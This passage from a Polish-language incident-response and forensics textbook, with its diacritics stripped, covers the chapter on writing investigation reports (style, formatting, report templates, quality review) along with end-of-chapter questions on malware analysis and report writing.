osign swoje cele. Zrozumienie, co te narzdzia robi, pomaga w odkryciu zamiarw hakera
i przedsiwziciu krokw zaradczych. W rozdziale tym przedstawilimy metody statycznej
i dynamicznej analizy szkodliwego oprogramowania, ktre naszym zdaniem umoliwiaj szybk
identyfikacj podejrzanego programu i okrelenie jego funkcjonalnoci. Jeli nawet techniki te nie
zadziaaj idealnie, wiedza z tego rozdziau pomoe Ci zachowa bezpieczestwo podczas pracy.
PYTANIA
1. Jakie s gwne rnice midzy technikami analizy statycznej i dynamicznej? Jakie s zalety
kadej z nich?
2. Jakie czynniki naley uwzgldni przy kompletowaniu bezpiecznego rodowiska do analizy
szkodliwego oprogramowania? Gdyby powierzono Ci zadanie utworzenia takiego rodowiska,
jakie narzdzia przygotowaby do uycia zarwno w ramach analizy statycznej,
jak i dynamicznej?
3. W badanym systemie odkrywasz plik, ktry wydaje si podejrzany. Jak utworzysz bezpieczn
kopi tego pliku i przeniesiesz j do rodowiska analitycznego? Opisz procedur dziaania
zarwno podczas pracy w dziaajcym systemie, jak i z obrazem dysku twardego.
4. Na podstawie poniszych informacji powiedz, co zrobisz w nastpnej kolejnoci,
aby dowiedzie si wicej o badanym pliku.
a) Wyszukiwanie skrtu MD5 w najwikszych bazach danych nie dao rezultatu.
b) Programy antywirusowe nie rozpoznaj pliku jako zagroenia.
c) Plik zawiera niewiele czytelnych acuchw, z ktrych wikszo jest nieprzydatna.
5. Przeprowadzasz dynamiczn analiz pliku w systemie Windows i otrzymujesz z monitora
procesw nastpujce informacje.
a) Badany program wywouje funkcj SetWindowsHookEx.
b) W folderze tymczasowych aplikacji uytkownika utworzony zostaje plik bpk.dat.
c) Zapis pliku nastpuje w pozornie losowych odstpach czasu, ale wydaje si, e s one
krtsze, gdy system jest uywany.
d) Sprawdzasz zawarto pliku, ale zawiera on nieczytelne dane binarne.
6. Przedstaw jak teori na temat funkcjonalnoci pliku.
ROZDZIA 16.
Pisanie raportw
P
ewien mdry czowiek kiedy powiedzia: Jeli czego nie ma w dokumentacji, znaczy to,
e tego nie byo. W dziedzinie bezpieczestwa komputerowego jest to zota zasada, ktrej
powinni przestrzega wszyscy specjalici od informatyki ledczej. Skrupulatne pisanie na
czas kompletnych i czytelnych raportw zawierajcych odpowiedzi na stawiane w ledztwie pytania
jest bardzo wane, ale i niezwykle trudne. Trudnoci sprawiaj, e wiele organizacji, gdy dojdzie
do incydentu bezpieczestwa, zaniedbuje kwestie sporzdzania dokumentacji. Jednak kiedy moe
nadej dzie, w ktrym losy przedsibiorstwa bd zalee wanie od treci raportu. Jako e nie
potrafimy przewidywa przyszoci, kady nasz raport powinien spenia pewne podstawowe wymogi
bez adnych wyjtkw. Kiedy nadejdzie ten sdny dzie i przyjdzie wykorzysta napisany
wczeniej raport, bdzie mona spa spokojnie, wiedzc, e dokument przejdzie pomylnie prb.
W rozdziale tym dzielimy si naszymi dowiadczeniami z pisania raportw.
PO CO PISA RAPORTY
Oto jedno z podstawowych pyta, jakie zapewne zada sobie niejeden czytelnik: Po co w ogle
naley pisa raporty?. Czasami powd jest oczywisty mog wymaga tego jakie zasady lub
przepisy prawa albo szef moe wyda okrelone polecenie. Czasami moe nie by adnych
przekonujcych powodw do napisania raportu. Mimo to, zalecamy sporzdzanie dokumentacji
zawsze wtedy, gdy analizuje si dowody lub reaguje na incydent, niezalenie od skali wydarzenia
i tego, czy udao si ustali co konkretnego, czy nie. Niektrzy kwestionuj zasadno takiego
podejcia, ale naszym zdaniem jest to podstawa procesu reakcji na incydent i informatyki ledczej.
Poniej dokadniej wyjaniamy nasze stanowisko w tej sprawie.
Nasza praca, mwic najprociej, polega na badaniu dowodw w celu uzyskania odpowiedzi
na pewne pytania. S one najczciej formuowane w toku postpowania prawnego lub
administracyjnego, a wic podczas dziaa, ktrych efekty mog mie wpyw na ycie ludzi.
Dlatego powinnimy dooy wszelkich stara, aby dostarczy dokadne odpowiedzi do
odpowiednich osb. Niektrzy twierdz, e tak wanie brzmi podstawowa definicja informatyki
ledczej... i maj racj. W tym kontekcie jest jasne, e zaniechanie sporzdzania dokumentacji
jest zwykym zaniedbaniem obowizkw.
Istniej te inne, cho mniej powane, powody do sporzdzania raportw. Pisanie raportu
zmusza nas do zastanawiania si nad tym, co robimy. Czasami opisanie poznanych faktw na
papierze pomaga w dostrzeeniu zwizkw lub odkryciu bdw, ktre wczeniej umkny uwadze.
wiczenie polegajce na napisaniu dokumentacji moe nawet pomc w rozwizaniu sprawy.
Ponadto treci raportu mona uy w wielu sytuacjach. Przykadowo majc dokumentacj
dokonanych ustale, atwiej mona dostarczy dane do aktualizacji stanu, przekazywa wiedz
i prowadzi szkolenia.
W niektrych przypadkach tworzenie pisemnej dokumentacji moe by zabronione. Zdarza si
tak najczciej, gdy radca prawny ma wtpliwoci dotyczce tego, czy ustalenia nie wyjd gdzie
na jaw. W takich przypadkach raport najczciej przedstawia si w formie ustnej. Kiedy w spraw
zamieszane s kwestie prawne, popro o dokadne wytyczne na temat sporzdzania raportu i tego,
ROZDZIA 16. PISANIE RAPORTW 517
w jakiej formie powinien zosta dostarczony. Poinformuj prawnikw o swoich standardowych

procedurach sporzdzania dokumentacji, aby pozwoli im na wyeliminowanie potencjalnych
problemw ju na samym pocztku sprawy.
Ostrzeenie Raporty ze ledztwa i reakcji na incydent podlegaj cisej kontroli, wic na twrcach tych
raportw spoczywa dua presja, aby wszystko zrobi dobrze. Poniewa nieczsto si zdarza,
aby ju na pocztku ledztwa udao si odkry wszystkie potrzebne fakty, zalecamy oznaczanie
wszystkich wczesnych raportw jako wersji wstpnych. W przeciwnym razie zmiany i dodatki
w nich mog by postrzegane jako oznaka niekompetencji lub prba oszustwa.
STANDARDY RAPORTOWANIA
Niewane, czy piszesz raport z powodw przedstawionych w poprzednim podrozdziale, czy innych,
musisz ustali standardy raportowania, aby zapewni najwysz jako dokumentu. W podrozdziale
tym opisujemy oglne cele raportowania oraz przedstawiamy konkretne zalecenia, ktre, jak wynika
z naszego dowiadczenia, skutecznie pomagaj w osigniciu tych celw.
Koncentracja sporzd list waciwych pyta wraz z odpowiedziami. Staraj si unika
dygresji. Najwaniejsze pytania i odpowiedzi powinny by atwe do znalezienia. Czytelnika
nie naley zmusza do szukania fragmentw informacji w rnych czciach raportu.
Najwaniejsze jest zdefiniowanie i osignicie okrelonego celu.
Zrozumiao pisz z myl o odbiorcy i staraj si uj myli w jak najmniejszej iloci
sw. Jeli np. raport jest przeznaczony gwnie dla kadry kierowniczej, musisz tak dobiera
wyrazy, aby byy zrozumiae dla tej grupy osb. Przydatne moe by zwize streszczenie
zawierajce najwaniejsze informacje interesujce dyrekcj.
Trzymaj si faktw przedstawiaj jednoznaczne i poprawne informacje. Unikaj
subiektywnych ocen oraz nie stosuj terminw i wyrae, ktre atwo mona le
zinterpretowa. Wszystkie stwierdzenia powinny mie poparcie w materiale dowodowym.
Nie mieszaj faktw z opiniami.
Czas ukocz pisanie raportu w rozsdnym czasie. W trakcie ledztwa dostarczony na
czas raport moe zawiera informacje, dziki ktrym uda si unikn powanych szkd
w organizacji. Najlepszym sposobem na uniknicie opnie jest pisanie na bieco.
Nigdy nie czekaj z rozpoczciem pisania dokumentacji na zakoczenie analiz.
Odtwarzalno opisane w raporcie wyniki powinno da si odtworzy. Dodaj wic
informacje, dziki ktrym kady bdzie mg odtworzy Twoje odkrycia. Moesz np.
napisa, e odzyskae dziesi plikw RAR. Nikt z zewntrz nie bdzie w stanie odtworzy
Twoich ustale, jeli nie dodasz informacji o tym, jak zdobye te pliki i gdzie na dysku je
znalaze. Opis nie musi by dugi. Wystarczy poda, e przeszukano nieprzydzielon
przestrze w poszukiwaniu standardowego nagwka plikw RAR, czyli szesnastkowego
cigu 0x52 0x61 0x72 0x21 0x1A 0x07 0x00. Jeli sprawa jest delikatna i istnieje due
prawdopodobiestwo, e bd potrzebne zeznania eksperta w sdzie, te trzeba to
uwzgldni warto wwczas rozway dodanie wikszej iloci szczegw.
Styl i formatowanie raportu

W rozdziale tym przedstawiamy wiele indywidualnych zalece, ale generalnie raporty powinny
by skoncentrowane na konkretnym temacie, dokadne i zwize. Innymi sowy, raport powinien
odpowiada na zadane pytania przy uyciu jak najmniejszej liczby sw. Raport ze ledztwa
informatycznego to nie dzieo sztuki ani intelektualna rozrywka, tylko prezentacja faktw,
wic wszelkie opinie powinny by wyranie zaznaczone i poparte faktami.
Niektrzy twierdz, e nasze standardy ustalilimy arbitralnie, s trudne do przestrzegania,
a nawet czasami kc si ze zdrowym rozsdkiem. Cho niektre z naszych zalece rzeczywicie
mog odbiega od tego, do czego inni s przyzwyczajeni, z pewnoci nie s wyssane z palca
i chtnie stosuj si do nich take inni specjalici z tej samej brany, ktrzy te musz pisa duo
raportw technicznych. Przykadem wytycznych dotyczcych pisania raportw, ktry bardzo
cenimy, jest dokument Improving Your Technical Writing Skills Normana Fentona ze School
of Electronic Engineering and Computer Science w Queen Mary (University of London).
Autor opisuje w nim wiele kwestii, ktre poruszamy take my, oraz dodaje kilka innych tematw,
a wszystko popiera pomocnymi przykadami.
W INTERNECIE
www.eecs.qmul.ac.uk/~norman/papers/good_writing/Technical%20writing.pdf
Warto przeczyta ten dokument jako suplement do rozdziau, a nastpnie postara si wdroy
opisane w nim wytyczne nie bdzie to atwe, ale jeli si uda, Twoje raporty z pewnoci stan
si lepsze.
Opisywane przez nas wskazwki nie s ostatecznymi zasadami, ktrych naley trzyma si
za wszelk cen. Jest to zbir wytycznych, ktrych przestrzeganie pomaga w pisaniu klarownych
i czytelnych raportw. W niektrych przypadkach niewolnicze stosowanie si do porad moe mie
wrcz odwrotny skutek. Autor musi sam oceni, co w danej sytuacji jest najlepsze, i odpowiednio
si zachowa. Oto kilka konkretnych zalece stylistycznych.
Uywaj strony czynnej zdania zawierajce czasowniki w stronie czynnej s z reguy
bardziej zrozumiae i zwilejsze. Aby zamieni zdanie w stronie czynnej na stron biern,
zawsze trzeba uy wicej sw, przez co wypowied jest mniej zwiza. Przykadowo to
zdanie w stronie czynnej skada si z trzech wyrazw: Haker skrad dane. Natomiast
w stronie biernej przekazanie tej samej informacji wymagaoby uycia piciu sw:
Dane zostay skradzione przez hakera. Niektrzy staraj si skraca takie zdania przez
pominicie wykonawcy czynnoci i pisz: Dane zostay skradzione. Rzeczywicie jest to
krtsza forma, ale te mniej dokadna.
Uywaj czasu przeszego jedn z podstawowych zasad pisania raportw ze ledztw
jest uywanie czasu przeszego. Wszystkie opisywane w dokumencie zdarzenia miay
miejsce w przeszoci, wic powinno si je przedstawia w czasie przeszym.
Pisz krtkie zdania nie wiemy, jaki jest rekord, ale widzielimy w raportach zdania
zawierajce nawet ponad czterdzieci sw. Jednak ju przy dwudziestu sowach wcza si
alarm. Wszystkie zdania przekraczajce trzydzieci sw powinno si napisa na nowo.
Pisz konkretnie jeli znasz lub moesz pozna dokadn liczb plikw w katalogu, nie
pisz stwierdze typu w katalogu znajdowao si kilka plikw. Oglnie rzecz biorc, staraj
si nie uywa takich sw jak wiele, liczne, kilka, par itd., poniewa odnosz si one do
poj subiektywnych. Posuguj si konkretnymi liczbami! Nie dziel te prostych faktw
tylko po to, by skrci zdania. Lepiej napisa Plik o nazwie kout.dat zawiera dane
zgromadzone przez program rejestrujcy naciskane klawisze ni Program rejestrujcy
naciskane klawisze wysya dane do pliku. Plik ten nazywa si kout.dat.
Opisz, co udao si zrobi, a nie czego si nie udao jeli ustalenia s negatywne,
wyjanij, co zrobie i jakie byy efekty tych dziaa. Unikaj stwierdze w stylu nie udao si
odzyska pliku czy nie udao si. Tego rodzaju wyraenia mog zosta zinterpretowane
jako brak umiejtnoci zwaszcza wtedy, kiedy nie napisze si dodatkowo, jakie byy
przyczyny poraki. Przykadowo zamiast pisa analitykowi nie udao si odzyska
usunitego pliku, lepiej napisa system operacyjny wykorzysta przestrze zajmowan
uprzednio przez skasowany plik, dlatego odzyskanie tego pliku stao si niemoliwe.
Prowad czytelnika przez tekst z naszych dowiadcze wynika, e raport atwiej si
czyta, jeli jest zbudowany wok koncepcji napisz, co zamierzasz opisa, potem to
rzeczywicie opisz, a nastpnie podsumuj swoj wypowied. Czytelnikowi atwiej
przyswoi informacje, jeli najpierw zostanie wprowadzony do tematu. Zamiast np.
po prostu przedstawia list plikw znalezionych w katalogu i opisa ich przeznaczenie,
lepszym rozwizaniem jest napisanie na pocztku akapitu, e zawiera on opis trzech
plikw z okrelonego katalogu. Tego rodzaju zabiegi z reguy znacznie poprawiaj
czytelno raportu.
Poprawnie uywaj akronimw akronimy pozwalaj zaoszczdzi miejsce, ale przy
pierwszym uyciu zawsze naley poda rozwinicie. Dotyczy to nawet powszechnie
znanych akronimw, poniewa jeden akronim moe mie kilka rnych rozwini. I tak
DFS moe oznacza zarwno Distributed File System, jak i Discover Financial Services albo
Dynamic Frequency Selection. Ponadto nie rb bdw w zapisie akronimw jeli trzeba,
poszukaj informacji w odpowiednich rdach: DNS oznacza Domain Name System,
a nie Server czy Service.
Wystrzegaj si argonu i niejednoznacznych okrele termin eksfiltracja naley do
argonu bezpieczestwa komputerowego i staramy si go nie uywa w naszych raportach.
Lepszym okreleniem jest np. kradzie danych, bo jest zrozumiae dla kadego. Staramy
si te unika niejednoznacznych sw, takich jak zagroenie. Stwierdzenie, e system jest
zagroony, to tak jakby lekarz powiedzia, e kto jest chory. Zazwyczaj ju to wiemy.
Jeli chcesz zrozumie problem i go rozwiza, musisz zna szczegy. Nie zapomnij ich
opisa w raporcie.
Konsekwentnie uywaj nazw dobierz odpowiednie nazwy i uywaj ich konsekwentnie

w caym raporcie. Jeeli postanowisz nazwa komputer systemem, odnoszenie si do
niego na rne inne sposoby moe spowodowa nieporozumienia. Przykadowo raz moesz
napisa host, innym razem wze itd. W dalszej czci raportu moe by mowa o strukturach
drzewiastych, w ktrych kontekcie sowo wze ma cakiem inne znaczenie.
Nie stosuj nieformalnego jzyka nie uywaj wyrae potocznych, np. obadano
zamiast zbadano, haker dobra si do czego zamiast haker uzyska dostp czy
wygldao dziwnie zamiast znaleziono anomalie. Raporty to nie wiadomoci e-mail
do znajomych. S to formalne dokumenty, ktre reprezentuj Ciebie i Twoj organizacj.
Wyranie zaznaczaj wasne opinie wasn opini warto wyrazi, gdy jest podejrzenie,
e czytelnik moe nie mie wystarczajcej wiedzy technicznej, aby domyli si
prawdopodobnego przebiegu wydarze na podstawie zebranych faktw. Czasami klient
wprost prosi o opini na dany temat. Kiedy w raporcie wyraasz swoje subiektywne zdanie,
zawsze wyranie to oznacz i przedstaw fakty na poparcie swojej tezy, aby czytelnik wiedzia,
dlaczego twierdzisz tak, a nie inaczej. Opinie niepoparte faktami nie maj racji bytu
w raportach ze ledztw.
Uwaga W systemie prawnym USA raporty zawierajce opinie uznawane s za ekspertyzy. Autor takiego
raportu jest ekspertem i podobnie jak raport musi spenia pewne kryteria, aby zyska uznanie
w sdzie. Zalecenia opisane przez nas w tym rozdziale pomagaj w spenieniu tych wymaga, ale
na pewno tego nie gwarantuj. Wielu z nas z pewnoci brakuje pewnych cech osobistych, np.
niedawnych publikacji czy dowiadczenia sdowego. Jeli wic nie masz pewnoci, e speniasz
wszelkie wymagania, lepiej powstrzyma si od wyraania opinii w raportach, ktre maj by
wykorzystywane w procesach sdowych. Czasami jednak dziki takim opiniom moe nastpi
zwrot w sprawie. Jeli wic uwaasz, e dana opinia jest wana i moe zmieni bieg postpowania,
ale nie czujesz si wystarczajco wiarygodny jako ekspert, popro o pomoc kogo z odpowiednimi
kwalifikacjami.
Oprcz wytycznych stylistycznych, ktre dotycz treci, istniej te standardy dotyczce

formatowania. Okrelaj one aspekty prezentacyjne raportu, np. krj czcionki, sposb zapisu dat,
sposb przedstawiania rysunkw i tabel itd. Poniej opisujemy najwaniejsze kwestie z tej
dziedziny.
Konsekwentnie uywaj czcionek i odstpw wybierz taki krj pisma i tak szeroko
odstpw, aby tekst by najczytelniejszy, i trzymaj si tych ustawie we wszystkich czciach
raportu. Mona wykorzysta wicej ni jeden krj pisma, ale pod warunkiem e robi si to
w konsekwentny sposb, np. podpisy pod rysunkami lub fragmenty kodu rdowego
mona drukowa czcionk o staej szerokoci znakw. Nie naley jednak uywa mao
znanych ani nieprofesjonalnych fontw, takich jak Comic Sans czy KaiTi. Niektrzy pisz
raporty zgodnie z wasnymi upodobaniami, ale raport to nie miejsce na wyraanie wasnej
kreatywnoci.
Daty i godziny wybierz jeden format zapisu dat i godzin, i konsekwentnie si go trzymaj.
Wybrana metoda zapisu powinna reprezentowa dat i godzin w sposb niepozostawiajcy
wtpliwoci. Dlatego zalecamy zapisywanie dat w formacie DD miesic RRRR, np.
28 wrzenia 2012. W raporcie nie moe znale si zapis w stylu 05.05.05, poniewa nie
wiadomo, jak go zinterpretowa. Godziny zawsze przedstawiamy w strefie czasowej UTC
w formacie 24-godzinnym, np. piszemy 17:03:12 UTC zamiast 5:03:12 UTC. Zdecydowanie
odradzamy uywanie czasu lokalnego, poniewa bardzo utrudnia to korelacj zdarze
i konwersj wartoci czasowych. Standard ten dotyczy tylko dat pisanych przez nas
np. nie zmieniaj dat znajdujcych si w materiale dowodowym ani dostarczonych
przez narzdzia ledcze.
Przedstawiaj metadane w standardowej formie utwrz tabele i inne standardowe
formaty dokumentacji metadanych zwizanych z poczynionymi ustaleniami. Jeli np.
w ramach ekspertyzy odkryjesz pliki, wszystkie powinny zosta opisane w ten sam
standardowy sposb z podaniem nazwy, znacznikw czasu, cieki, skrtu MD5 i innych
istotnych informacji.
Stosuj podpisy i odsyacze do pisania raportw uywamy programu Microsoft Word,
ktry zawiera wbudowane funkcje do tworzenia podpisw i odsyaczy. Pod wszystkimi
tabelami i rysunkami zawsze umieszczamy podpisy w takim samym formacie oraz
dodajemy do nich odsyacze w tekcie. Odsyacz powinien wyjania zawarto tabeli
lub ilustracji nie ka czytelnikowi domyla si, o ktrej tabeli aktualnie piszesz.
Prawidowo posuguj si tabelami i ilustracjami informacje skadajce si z wielu
rekordw o licznych waciwociach, takie jak np. historia przegldarki internetowej,
najlepiej przedstawia w formie tabeli. Jeli trzeba doda wycinki zawartoci pliku,
mona posuy si ilustracjami z czcionk o staej szerokoci i obramowaniem.
Zdefiniuj standardowy sposb formatowania (krj pisma, obramowanie, cieniowanie)
tabel i ilustracji. Nie zapomnij doda podpisw i odniesie do nich w tekcie raportu.
Stosuj listy wypunktowane i numerowane akapity zawierajce opisy dugich list s
trudne w odbiorze. Czasami lepiej zamieni je na listy, ktre s znacznie bardziej czytelne.
Tre i organizacja treci raportu

Powinno si zdefiniowa szablony wszystkich najwaniejszych typw raportw, jakie s
sporzdzane w organizacji. Jeli planujesz utworzenie kilku szablonw, musisz mie dobre
uzasadnienie dla tej dodatkowej pracy. Drobne rnice mona opisa w uwagach. W naszej firmie
mamy trzy typowe szablony, ktrych uywamy do sporzdzania raportw ze ledztw: oglny
szablon dokumentacji ledztwa, oglny szablon dokumentacji analizy oraz szablon dokumentacji
analizy szkodliwego oprogramowania. Przyjrzymy si strukturze raportu oglnej dokumentacji
ledztwa i raportu dokumentacji analizy. Na potrzeby tego rozdziau wszystkie rodzaje raportw
analitycznych z analizy ledczej, na ywo i szkodliwego oprogramowania zaliczamy do jednej
kategorii.
Oglny szablon dokumentacji ledztwa suy do sporzdzania raportu z caego incydentu

i obejmuje wszystkie analizy i inne raporty, ktre powstay podczas trwania dochodzenia.
Raport taki powinien by czytelny dla szerokiego grona odbiorcw, wic musi zawiera oglne
podsumowania, szczegy na rednim poziomie oraz szczegowe raporty z analiz indywidualnych.
Tworzenie takich caociowych raportw jest trudne i czasochonne. S to obszerne dokumenty
zawierajce nie tylko opis ustale ledztwa, ale i zalecane rozwizania. Oto lista sekcji, z ktrych
skada si taki typowy raport.
Strona tytuowa i spis treci raport musi mie stron tytuow, na ktrej powinna
znajdowa si nazwa organizacji, ktrej dotyczyo dochodzenie, i krtki opis raportu zwykle
skadajcy si z numeru lub nazwy incydentu, daty publikacji oraz nazwy organizacji, ktra
przeprowadzia ledztwo. Jeli trzeba, na stronie tej mona dodatkowo umieci znaki
ochronne typu Poufne.
To to incydentu powinno zawiera opis, jak doszo do jego wykrycia, co odkryto i jakie
czynnoci podjto w ramach reakcji, oraz list celw ledztwa. To zazwyczaj zajmuje okoo
dwch akapitw. Powinno si w nich napisa, ile czasu trway prace, dat rozpoczcia
i zakoczenia tych prac oraz kto za to zapaci.
Ustalenia dokonane ustalenia powinny bezporednio dotyczy celw ledztwa oraz
by opisane w sposb zwizy i przejrzysty. Opis ustale powinien by podsumowaniem
informacji przedstawionych w sekcji odkry redniego poziomu. Jako e odkrycia te
nale do podsumowania przeznaczonego dla kadry kierowniczej, ich opis powinien by
zrozumiay dla szerokiego grona odbiorcw. Opis ustale z reguy zajmuje nie wicej ni
jedn stron.
Zalecenia wyrnia si zalecenia krtkoterminowe i dugoterminowe. Rekomendacje
krtkoterminowe to opis czynnoci, ktre powinny rozwiza aktualny problem. Mona je
wykona szybko, aby pozby si biecego zagroenia. Natomiast zalecenia dugoterminowe
dotycz oglnego wzmocnienia zabezpiecze organizacji, aby zapobiec przyszym incydentom.
Sekcje redniego poziomu w czciach tych zbiera si, interpretuje i podsumowuje
ustalenia z wielu indywidualnych raportw analitycznych. Nazwy tych sekcji mog by
rne, ale generalnie powinny odnosi si do pyta postawionych w ledztwie. Sekcje
redniego poziomu przedstawiaj szerok panoram, ale zawieraj te pewn dawk
szczegw technicznych. Zawarte w tych sekcjach informacje maj bezporednie poparcie
w materiale dowodowym zaprezentowanym w indywidualnych raportach z analiz.
Indywidualne raporty z analiz w czci tej umieszcza si pene raporty z analiz, np.
ledczych, na ywo i szkodliwego oprogramowania. Zawarte w nich informacje stanowi
podstaw wszystkich ustale opisanych w raporcie.
Dodatki w dodatkach najczciej umieszcza si dugie listy i wyimki, np. zawarto
dziennikw i listy plikw, ktre zajmuj wiele stron. Kada tabela i ilustracja przekraczajce
rozmiar strony negatywnie wpywaj na czytelno raportu. Dodatek to doskonae miejsce
na takie informacje.
Raporty analityczne, przykadowo z analiz ledczych lub szkodliwego oprogramowania,

zawieraj wyniki analizy jednego rda dowodw (np. dysku twardego albo zbioru dziennikw).
Wykonujemy wiele rnych rodzajw analiz, ale wikszo raportw wyglda podobnie. I tak
raporty z analiz ledczych i systemw na ywo maj bardzo podobn struktur. Rni si tylko
drobiazgami w tytuach sekcji. Wyjtkiem s raporty z analizy szkodliwego oprogramowania,
ktre z reguy zawieraj bardzo konkretne nazwy sekcji odnoszce si cile do wynikw analizy.
Poniej znajduje si lista sekcji, ktre mona znale w wikszoci typowych raportw
analitycznych.
Strona tytuowa i spis treci sekcje te s czciej spotykane w samodzielnych
i obszernych raportach analitycznych. Strona tytuowa pozwala zorientowa si, czego
dotyczy dokument, oraz stanowi podstawowe zabezpieczenie przed ciekawskimi, ktrzy
chcieliby rzuci okiem na opisane w raporcie ustalenia. W obszerniejszych dokumentach
przydaje si te spis treci, ktry uatwia znajdowanie interesujcych czci. Oba te skadniki
sprawiaj, e raport wyglda bardziej profesjonalnie.
To sekcja ta w indywidualnym raporcie z analizy powinna zawiera opis kontekstu,
w jakim zosta przeanalizowany dany obiekt. W czci tej powinno si jasno opisa, jakie
zdarzenia doprowadziy ledczego do danego materiau dowodowego. Ponadto naley
napisa, kto znalaz ten materia, jak weszlimy w jego posiadanie oraz jakie s oglne
cele analizy. W sekcji ta nie opisuje si ustale przedstawionych w raporcie.
Ustalenia najwaniejsze ustalenia powinno si przedstawi w pocztkowej czci raportu
w jasnej i zwizej formie. Opis kadego ustalenia powinien zawiera zwize przedstawienie
potwierdzajcych je dowodw oraz rozwinicie z wiksz liczb szczegw w dalszej czci
dokumentu.
Przebadane dowody kady raport ze ledztwa i bada naukowych powinien zawiera
list przebadanych obiektw. W przypadku informatyki ledczej i reakcji na incydenty
bezpieczestwa komputerowego naley poda list dowodw, ktre zostay przebadane
w ramach ekspertyz.
Osie czasowe o czasowa to sekcja opcjonalna, ale w niektrych raportach niezwykle
cenna. Z reguy zawiera ona tabel z list najwaniejszych wydarze spisanych w porzdku
chronologicznym. Daty i godziny powinny by podane w czasie UTC oraz opatrzone
informacjami na temat zdarzenia i rda wiedzy o nim. O czasow z reguy umieszcza si
na pocztku raportu, wic nie powinna by zbyt obszerna najlepiej, aby nie zajmowaa
wicej ni jedn stron. Dobrym sposobem na skondensowanie licznych zdarze jest ich
podsumowanie. Jeli np. haker utworzy dziesi plikw RAR, wymienianie kadego z nich
w osobnym wierszu jest marnowaniem miejsca. Dlatego lepiej napisa zbiorczo, e haker
utworzy dziesi plikw RAR w danym okresie. Jeli jednak w midzyczasie miay miejsce
inne zdarzenia, lepszym wyjciem moe by podzielenie opisu tworzenia plikw RAR
na kilka czci, tak aby odpowiednio umiejscowi take te dodatkowe zdarzenia.
Szczegy analizy w tej sekcji przedstawia si drobiazgowo szczegowe informacje, czyli

najdokadniejsze fakty i szczegy wykryte podczas analizy, dziki ktrym sformuowano
podstawowe ustalenia opisane w raporcie. Najczciej odkrycia te prezentujemy w trzech
formatach: chronologicznie, z podziaem na kategorie i wg stopnia wanoci. W prezentacji
chronologicznej wymieniamy wszystkie odkrycia wg dat. Kategoryzacja najczciej polega
na przyporzdkowaniu ustale do rde dowodw np. systemu plikw, dziennikw
zdarze itd. Prezentacja wg poziomu wanoci polega na przedstawieniu na pocztku tych
ustale, ktre miay najwikszy wpyw na uzyskanie odpowiedzi na pytania postawione
w ledztwie.
Dodatki w dodatkach do raportw analitycznych umieszcza si takie same informacje
jak w dodatkach do raportw oglnych.
KONTROLA JAKOCI
Bez wzgldu na to, jak bardzo jestemy pewni, e nasz raport jest najwyszej jakoci, dobra korekta
zawsze wykryje jakie niedocignicia. Poddanie dokumentu procesowi recenzji uchroni Ci przed
przekazaniem klientowi produktu o niezadowalajcej jakoci. Kompletny proces kontroli jakoci
obejmuje przegld treci pod ktem zgodnoci z wytycznymi dotyczcymi stylu, formatowania,
treci i dokadnoci technicznej. W wikszoci organizacji do przeprowadzania takich weryfikacji
wyznaczone s specjalne osoby. Recenzentem nie moe by autor raportu. Czasami proces recenzji
nazywa si korekt koleesk i jego przeprowadzenie jest wymagane w akredytowanych
laboratoriach informatyki ledczej.
Ostrzeenie Kontrola jakoci w poczeniu z wdroeniem waciwych procedur powinna uniemoliwia

przedostanie si treci z jednego raportu do innego. Moe si to wydawa oczywiste, ale
niestety technologie, ktre nam pomagaj, mog te zaszkodzi. Wikszo edytorw tekstu,
np. Microsoft Word, zapisuje w plikach metadane i tekst z poprzednich wersji dokumentu.
Jeli nawet nie widzisz adnych poufnych informacji, nie znaczy to, e ich nie ma. Jeli co si
przelizgnie i zostanie odkryte, Twoja organizacja moe mie powane kopoty. Dlatego pisanie
raportu powinno si zawsze zaczyna od czystego szablonu oraz ewentualnie mona rozway
moliwo przekonwertowania dokumentu na inny format przed wysaniem go do klienta. Jeli
np. raport jest w formacie programu Microsoft Word, mona go zamieni na format Adobe PDF.
Recenzent ds. kontroli jakoci powinien sprawdzi metadane pliku, np. oglny czas pracy
nad dokumentem. Zawsze te poszukaj informacji na temat uywanego przez siebie formatu
dokumentu sprawd, jakie problemy moe sprawia i postaraj si je wyeliminowa.
Te rodki ostronoci uchroni Ci przed enujcymi i potencjalnie kosztownymi wpadkami.
I CO Z TEGO
Jest takie znane powiedzenie: Niewane, co mwisz, tylko jak mwisz. Pisanie raportu to dla
niektrych najtrudniejsza cz akcji RI. Nie raz widzielimy, jak specjalici, w ramach wyjanienia,
co zrobi haker, przedstawiali zrzuty ekranu. Trudno jednak ich wini, gdy w szkole nikt nie uczy
ludzi, jak poprawnie i skutecznie wyraa si na pimie. Jednak bez umiejtnoci poprawnego
pisania moesz przegra walk, zanim na dobre si zacznie. Dlatego naley cay czas rozwija
i odwiea swoje umiejtnoci pisarskie. Szukaj rde, z ktrych mona nauczy si wyraa
skomplikowane pomysy w prosty sposb. Ponadto dla nas bardzo pomocne s ponisze cytaty.
Jeli czego nie ma w dokumentacji, znaczy to, e tego nie byo.
Wyobra sobie, e za dwadziecia lat kto Ci spyta, w jaki sposb doszede do takich,
a nie innych wnioskw. Co napiszesz teraz, aby pniej odpowiedzie na to pytanie?
Wyobra sobie, e wyjaniasz swojej babci, co to jest internet. Oka cierpliwo
i wspczucie, aby pomc jej w nauce.
PYTANIA
1. Analizujesz obraz dysku twardego w poszukiwaniu usunitych plikw RAR. Koczysz
analiz i nie znajdujesz adnego takiego pliku. Szef kae nie pisa raportu. Co zrobisz
i dlaczego?
2. Wyjanij, dlaczego strona czynna jest preferowan form gramatyczn w raportach
technicznych. Podaj przynajmniej trzy przykady przedstawiajce rnic midzy stron
czynn i biern.
3. Zaprojektuj dwie tabele do prezentacji metadanych, ktrych nie opisano w tym rozdziale.
Wyjanij, dlaczego zastosowae taki, a nie inny ukad i dlaczego uye takich, a nie
innych pl.
4. Podczas analizy odkrywasz w pliku co, co wyglda jak numery kart kredytowych.
Przedstawiasz wycinek zawartoci tego pliku na ilustracji. Czy powiniene podj
jakie specjalne rodki w odniesieniu do sposobu prezentacji tych danych?
CZ V
Naprawa
ROZDZIA 17.
Wprowadzenie
do technik naprawczych
A
by reakcja na incydent bya skuteczna, naley dziaa dwubiegunowo przeprowadzi
ledztwo w sprawie zdarzenia i wdroy rodki naprawcze. Do tej pory cay czas
zajmowalimy si tylko metodami dochodzeniowymi: jak przygotowa si do incydentu,
jak zbiera dane oraz jak je analizowa. Jednak czynnoci naprawcze s rwnie wane i te
zasuguj na troch miejsca w ksice. Powicilimy im dwa cae rozdziay. W tym rozdziale
przedstawiamy podstawowe teoretyczne zagadnienia, a w nastpnym opisujemy praktyczny
